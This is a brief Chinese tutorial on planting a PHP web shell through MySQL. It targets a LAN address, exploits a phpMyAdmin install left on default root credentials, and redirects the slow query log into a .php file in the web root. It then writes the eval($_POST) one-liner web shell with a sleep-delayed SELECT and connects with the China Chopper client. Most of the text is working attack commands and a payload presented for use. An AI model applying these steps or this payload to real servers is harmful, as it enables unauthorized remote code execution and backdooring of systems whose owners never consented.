如何利用sql语句写入shell
如何利用sql语句写入shell,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。
目标ip:192.168.52.143
一、御剑扫描该地址
获取到重要信息:
1、网站的绝对路径
2、phpmyadmin,并且是默认账号密码:root
解决方法:
1、设置slow_query_log=1 启用慢查询日志。
2、修改slow_query_log_file日志文件的绝对路径以及文件名
set global slow_query_log_file='c:/phpstudy/www/xx.php'
3、向日志文件写入一句话
select '<?php eval($_POST[x]);?>' or sleep(11)
三、用菜刀链接
看完上述内容,你们掌握如何利用sql语句写入shell的方法了吗?如果还想学到更多技能或想了解更多相关内容,欢迎关注行业资讯频道,感谢各位的阅读!